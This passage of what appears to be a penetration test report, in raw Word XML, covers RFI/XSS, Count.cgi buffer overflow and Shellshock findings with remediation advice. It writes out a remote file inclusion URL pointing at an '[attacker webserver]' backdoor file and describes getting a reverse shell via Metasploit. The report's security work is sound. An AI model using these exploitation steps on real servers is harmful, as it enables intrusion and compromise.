        <w:t>PHP remote file inclusion</w:t>
      </w:r>
      <w:r w:rsidR="00572277">
        <w:t xml:space="preserve"> which allows an attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00105B96">
        <w:t>utilise a third party website XSS redirection attack that could be leveraged against clients and staff visiting the webpage that could be used to install malware from a third party server onto their personal devices along with the webserver to pivot the attack further to gain access to the backend database by stealing login credentials etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6384D7" w14:textId="20D4E23A" w:rsidR="00B30CDC" w:rsidRDefault="00501A2D" w:rsidP="00B30CDC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This XSS</w:t>
      </w:r>
      <w:r w:rsidR="00B30CDC">
        <w:t xml:space="preserve"> exploit was not executed due to the  </w:t>
      </w:r>
      <w:r w:rsidR="00105B96">
        <w:t>clients</w:t>
      </w:r>
      <w:r w:rsidR="00B30CDC">
        <w:t xml:space="preserve"> instructions to not execute</w:t>
      </w:r>
      <w:r w:rsidR="00837FFD">
        <w:t xml:space="preserve"> or inject</w:t>
      </w:r>
      <w:r w:rsidR="00B30CDC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>arbitrary</w:t>
      </w:r>
      <w:r w:rsidR="00B30CDC">
        <w:t xml:space="preserve"> code within the webserver </w:t>
      </w:r>
      <w:r w:rsidR="00105B96">
        <w:t xml:space="preserve">that could infect the webserver along with staff/clients of the business and  also affect the performance of the live webserver that clients and staff are currently utilising. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8311E" w14:textId="1F4E514D" w:rsidR="00501A2D" w:rsidRDefault="00501A2D" w:rsidP="00501A2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This vulnerability has been given an ‘extremely high’ rating due to the ability in which arbitrary code can be </w:t>
      </w:r>
      <w:r w:rsidR="00837FFD">
        <w:t>injected into</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00837FFD">
        <w:t xml:space="preserve">backend </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidR="00692F1D">
        <w:t>This attack does not need user authentication permissions to be leveraged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1B6C90" w14:textId="0F226248" w:rsidR="00354E63" w:rsidRDefault="00501A2D" w:rsidP="00501A2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This attack was possible because of the unsecure iframes being utilised within this section of the website. The researcher recommends that this vulnerability be immediately patched by ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cyber Ltd’ network securty engineers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35211B01" w14:textId="2AB83286" w:rsidR="0080126E" w:rsidRPr="00354E63" w:rsidRDefault="0080126E" w:rsidP="00501A2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">An example of how the attack would be leveraged would be by execution the code: </w:t>
      </w:r>
      <w:r w:rsidRPr="0080126E">
        <w:t>http://tevelcyber.com/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webserver</w:t>
      </w:r>
      <w:r w:rsidRPr="0080126E">
        <w:t>]/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>malicous_code_trojan_horse_backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="0080126E">
        <w:t>.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> into a client browsers URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467F0BD" w14:textId="24B39711" w:rsidR="00587262" w:rsidRDefault="00587262" w:rsidP="00587262">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc40134051"/>
      <w:r>
        <w:t>6.2.2.1 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="18B73D6C" w14:textId="5EB96043" w:rsidR="00587262" w:rsidRPr="00587262" w:rsidRDefault="00105B96" w:rsidP="00587262">
      <w:r>
        <w:t xml:space="preserve">To patch this vulnerability the researcher recommends that the network security engineers at the </w:t>
      </w:r>
      <w:r w:rsidR="0080126E">
        <w:t>company</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0080126E">
        <w:t xml:space="preserve">remove the unsecure iframe from the vulnerable page along with upgrading the E-Mail application reader to a more secure reader such as:  </w:t>
      </w:r>
      <w:r w:rsidR="0080126E" w:rsidRPr="0080126E">
        <w:t>Java Apache Mail Enterprise Server</w:t>
      </w:r>
      <w:r w:rsidR="0080126E">
        <w:t xml:space="preserve"> (JAMES) </w:t>
      </w:r>
      <w:r w:rsidR="00C429EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C429EE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="009B0288">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://james.apache.org/","abstract":"Java Apache Mail Enterprise ","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"Apache","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Apache.org","id":"ITEM-1","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Apache James","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=6e7aa958-f19e-3f2a-83e0-eb09770dfba5"]}],"mendeley":{"formattedCitation":"[118]","plainTextFormattedCitation":"[118]","previouslyFormattedCitation":"[118]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00C429EE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007F4379" w:rsidRPr="007F4379">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[118]</w:t>
      </w:r>
      <w:r w:rsidR="00C429EE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C429EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0080126E">
        <w:t xml:space="preserve">that is compatible with the webserver </w:t>
      </w:r>
      <w:r w:rsidR="000B356A">
        <w:t>currently being utilised by the company that</w:t>
      </w:r>
      <w:r w:rsidR="0080126E">
        <w:t xml:space="preserve"> has no known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5C3CF" w14:textId="5640AFFB" w:rsidR="00EF183F" w:rsidRDefault="00587262" w:rsidP="00EF183F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc40134052"/>
      <w:r>
        <w:t>6.2.3 Attack 3</w:t>
      </w:r>
      <w:r w:rsidR="00C200A2" w:rsidRPr="00C200A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0075242D">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00C200A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0075242D">
        <w:t>Buffer Overflow Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidR="00EF183F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C5C271" w14:textId="76313F8D" w:rsidR="00EF183F" w:rsidRDefault="0075242D" w:rsidP="0075242D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file found in the hidden directory </w:t>
      </w:r>
      <w:r w:rsidR="00EF183F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF183F">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF183F">
        <w:t>-bin</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF183F">
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF183F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is shell script utilised by websites to count the hits a website receives. This script is vulnerable to buffer overflow attacks within a website that allows remote execution to the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-bin/ directory of the webserver </w:t>
      </w:r>
      <w:r w:rsidRPr="0075242D">
        <w:t>CVE-1999-0021</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D6E918" w14:textId="5EB96E58" w:rsidR="00D0172B" w:rsidRDefault="00D0172B" w:rsidP="0075242D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A buffer overflow stack script can be written in C programming language and leveraged against the target using the Linux Curl tool. An example of a buffer overflow C script has been written that is illustrated in </w:t>
      </w:r>
      <w:r w:rsidRPr="00590DB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00590DB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>14.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53422CF7" w14:textId="77777777" w:rsidR="00590DB8" w:rsidRDefault="00D0172B" w:rsidP="00590DB8">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081ED6E6" wp14:editId="47463DA6">
            <wp:extent cx="5719445" cy="29178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9445" cy="2917825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E8A4E6D" wp14:editId="776C8FD5">
            <wp:extent cx="5719445" cy="259946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11316"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5719445" cy="2599465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D9918E" w14:textId="77777777" w:rsidR="00762F38" w:rsidRDefault="00D0172B" w:rsidP="00762F38">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F71D65B" wp14:editId="520AF1C1">
            <wp:extent cx="5719445" cy="27653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5514"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5719445" cy="276535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E2162B4" wp14:editId="4B400CF4">
            <wp:extent cx="5723890" cy="10756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3890" cy="1075690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6008EB" w14:textId="23E1DC73" w:rsidR="00D0172B" w:rsidRPr="00762F38" w:rsidRDefault="00762F38" w:rsidP="00762F38">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc40134079"/>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: CGI C Programme Created for Buffer Overflow Attack Against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00762F38">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="65F37985" w14:textId="7F899CBF" w:rsidR="00572277" w:rsidRDefault="00D0172B" w:rsidP="001A3BE5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The above script was not leveraged against the webserver because although it reveals </w:t>
      </w:r>
      <w:r w:rsidR="001A3BE5">
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stored within the memory buffer of the webserver it is also known to cause a DOS attack against the target. Because the target is a live website it was decided not to risk </w:t>
      </w:r>
      <w:r w:rsidR="001A3BE5">
        <w:t>causing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> downtime on the website </w:t>
      </w:r>
      <w:r w:rsidR="001A3BE5">
        <w:t>that is currently being utilised by the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49743C38" w14:textId="77777777" w:rsidR="001A3BE5" w:rsidRDefault="001A3BE5" w:rsidP="001A3BE5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc40134053"/>
      <w:r>
        <w:t>6.2.3.1 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="403B9948" w14:textId="47F6CF0E" w:rsidR="001A3BE5" w:rsidRDefault="001A3BE5" w:rsidP="00EF183F">
      <w:r>
        <w:t xml:space="preserve">To prevent a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> buffer overflow attack it is recommended to prevent remote shell execution within the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/ and /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-sys/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>direcotires</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of a webserver. This can be configured </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the webserver within the bash cli using the command; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 400 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. This command only allows the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script to be read and not written or executed </w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t>against the webserver, along with regularly updating and patching the Debian Linux OS with the CLI BASH syntax: [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E305E">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E305E">
        <w:t xml:space="preserve"> apt-get update &amp;&amp; apt-get upgrade].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C245BFC" w14:textId="1CFD6443" w:rsidR="001A3BE5" w:rsidRDefault="001A3BE5" w:rsidP="001A3BE5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc40134054"/>
      <w:r>
        <w:t xml:space="preserve">6.2.4 Attack </w:t>
      </w:r>
      <w:r w:rsidR="007A182B">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00C200A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t>Shellshock Exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="664027C4" w14:textId="1CD42571" w:rsidR="001A3BE5" w:rsidRPr="001A3BE5" w:rsidRDefault="001A3BE5" w:rsidP="001A3BE5">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script is also vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t xml:space="preserve">the Shellshock </w:t>
      </w:r>
      <w:r>
        <w:t>remote shell execution</w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003571F7">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shown in the code </w:t>
      </w:r>
      <w:r w:rsidR="007A182B">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="003571F7">
        <w:t xml:space="preserve"> the example code within</w:t>
      </w:r>
      <w:r w:rsidR="007A182B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A182B" w:rsidRPr="00B4415C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00B4415C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="007A182B">
        <w:t xml:space="preserve"> by executing it against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A182B">
        <w:t>Coun</w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="007A182B">
        <w:t>.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A182B">
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="003571F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007A182B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646EB23" w14:textId="77777777" w:rsidR="00B4415C" w:rsidRDefault="00B47D9E" w:rsidP="00B4415C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B47D9E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="186169C3" wp14:editId="66B2312F">
            <wp:extent cx="5731510" cy="2131695"/>
            <wp:effectExtent l="0" t="0" r="254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131695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C56492D" w14:textId="616F2ED2" w:rsidR="007650F9" w:rsidRPr="00B4415C" w:rsidRDefault="00B4415C" w:rsidP="00B4415C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc40134080"/>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reverse BASH Shell Script Created in Python to Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="4CB16BAE" w14:textId="47AB2973" w:rsidR="00ED058E" w:rsidRDefault="003571F7" w:rsidP="003571F7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Metasploit Framework was </w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t>utilsed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to leverage the shellshock attack against the target by utilising the</w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED058E">
        <w:t>apachemod_cgi_bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED058E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00ED058E" w:rsidRPr="003571F7">
        <w:t xml:space="preserve">conjunction with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003571F7">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003571F7">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003571F7">
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003571F7">
        <w:t xml:space="preserve">/unreal_ircd_3281__backdoor reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003571F7">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003571F7">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003571F7">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003571F7">
        <w:t xml:space="preserve"> scrip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t to exploit the </w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t xml:space="preserve"> shellshock </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00ED058E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in order to connect to a remote BASH shell within the target server. Shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00B4415C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00B4415C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15453FBB" w14:textId="77777777" w:rsidR="00B4415C" w:rsidRDefault="00ED058E" w:rsidP="00B4415C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
